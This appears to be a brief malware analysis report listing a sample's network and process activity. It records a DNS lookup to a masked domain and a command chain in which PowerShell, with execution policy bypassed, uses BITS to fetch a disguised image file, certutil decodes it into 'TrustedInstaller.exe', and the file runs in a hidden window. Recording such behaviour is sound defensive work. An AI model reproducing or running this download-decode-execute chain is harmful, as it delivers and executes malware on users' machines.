Technical Information
- 'la###durail.com':443
- DNS ASK la###durail.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell -exec bypass import-module bitstransfer; start-bitstransfer -source https://www.la###durail.com/wp-content/uploads/mainwp/meizu-120x490.png -destination %temp%\0TRXCYR.tmp & certu...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -exec bypass import-module bitstransfer; start-bitstransfer -source https://www.la###durail.com/wp-content/uploads/mainwp/meizu-120x490.png -destination %temp%\0TRXCYR.tmp & certu...
- '%WINDIR%\syswow64\certutil.exe' -decode %TEMP%\0TRXCYR.tmp %TEMP%\TrustedInstaller.exe
- '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\TrustedInstaller.exe